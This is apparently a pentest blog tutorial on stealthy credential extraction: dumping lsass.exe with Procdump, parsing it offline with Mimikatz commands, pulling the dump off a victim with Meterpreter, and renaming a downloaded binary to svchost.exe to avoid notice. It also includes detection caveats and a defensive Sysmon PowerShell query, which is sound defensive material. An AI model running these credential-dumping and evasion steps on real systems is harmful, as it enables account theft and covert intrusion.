Mimikatz Part I Procdump On Lsass

This post is about extracting passwords in stealth mode. By running Mimikatz offline against a Procdump memory dump of LSASS, we can bypass the security controls of most organizations, which are well aware of Mimikatz and look for any instance of it running during a pentest. The caveat is that the dump step still opens a handle to lsass.exe, which Sysmon (Event ID 10, ProcessAccess) and most EDR products record, so the stealth here is relative to detections that key on the Mimikatz binary itself.

An Overview:

Here are the steps involved:

  • Move procdump.exe to the victim VM
  • Run Procdump against lsass.exe to produce lsassdump.dmp
  • Move Mimikatz to the victim VM (or, stealthier, move the dump to the attacker VM)
  • Load the dump in Mimikatz: sekurlsa::minidump lsassdump.dmp, then sekurlsa::logonPasswords


Let’s get started.

Run procdump on lsass

[screenshot: procdump writing the lsass.exe dump]


Move mimikatz to victim VM

[screenshots: sending mimikatz from the Linux/Windows attacker box, and receiving it on the Linux/Windows victim]


Mimikatz lsassdump.dmp

[screenshot: mimikatz sekurlsa::minidump and sekurlsa::logonPasswords output]

Here you can see the output of Mimikatz on our lsass dump. The password is there; I'm not including it.


It’s as simple as that.
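As an added example that is not part of the original post, here is what the dump step leaves behind for a defender: a PowerShell query over Sysmon ProcessAccess events (Event ID 10) for any process that opened a handle to lsass.exe. It assumes Sysmon is installed on the dumped host with a ProcessAccess rule that covers lsass.exe (Sysmon needs Windows 7 or later, so this does not apply to the XP box in Scenario II), and that the query runs elevated on that host. The access-mask values it flags are the ones commonly cited in lsass-access detection rules; treat the exact list as an assumption rather than something the post establishes.

```powershell
# Added example, not part of the original post.
# Assumes Sysmon is running with a ProcessAccess (Event ID 10) rule covering lsass.exe,
# and that this is run elevated on the host that was dumped.
$events = Get-WinEvent -FilterHashtable @{
    LogName = 'Microsoft-Windows-Sysmon/Operational'
    Id      = 10
} -ErrorAction Stop

# Access masks sufficient to read lsass memory (assumption: values commonly seen in detection rules).
# 0x1FFFFF = PROCESS_ALL_ACCESS, what a full dump (procdump -ma) usually requests;
# 0x1010   = PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, the minimum MiniDumpWriteDump needs.
$suspicious = @('0x1FFFFF', '0x1010', '0x1410', '0x1438')

$hits = foreach ($e in $events) {
    # Flatten <Data Name="...">value</Data> pairs into a hashtable
    $data = @{}
    foreach ($d in ([xml]$e.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
    if ($data.TargetImage -notlike '*\lsass.exe') { continue }
    [pscustomobject]@{
        Time          = $e.TimeCreated
        SourceImage   = $data.SourceImage
        GrantedAccess = $data.GrantedAccess
        Flagged       = $suspicious -contains $data.GrantedAccess
        CallTrace     = $data.CallTrace
    }
}

# Renaming procdump.exe does not help here: SourceImage is the path of whatever opened the handle,
# and CallTrace shows dbghelp.dll/dbgcore.dll frames whenever MiniDumpWriteDump was used.
$hits | Where-Object Flagged | Sort-Object Time -Descending | Format-Table -AutoSize
```

On a quiet workstation the only legitimate openers of lsass with these masks are things like the antivirus and certain backup agents, so anything else in SourceImage, particularly from a user-writable directory such as C:\Windows\Temp, is the dump step of this post showing up in the logs.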

Scenario II: Downloading .dmp file remotely using Meterpreter

The objective here is to pull the Procdump output off the victim (Windows XP) with Meterpreter's download command:

download c:\\bin\\lsassdump.dmp

Note that the backslashes in the path must be doubled; a single backslash is treated as an escape character by Meterpreter.

This assumes Sysinternals Procdump is already present on the victim XP box, as it is in my case. Otherwise Procdump can be staged with Meterpreter's upload command, or fetched on the box itself with a wget-style downloader, e.g. wget -O svchost.exe <procdump download URL>, to be sneaky. Bear in mind that an svchost.exe running from anywhere other than System32 is itself a common detection rule, and the renamed binary still carries the signed Sysinternals version information, so the rename buys less than it seems.

Written on May 12, 2018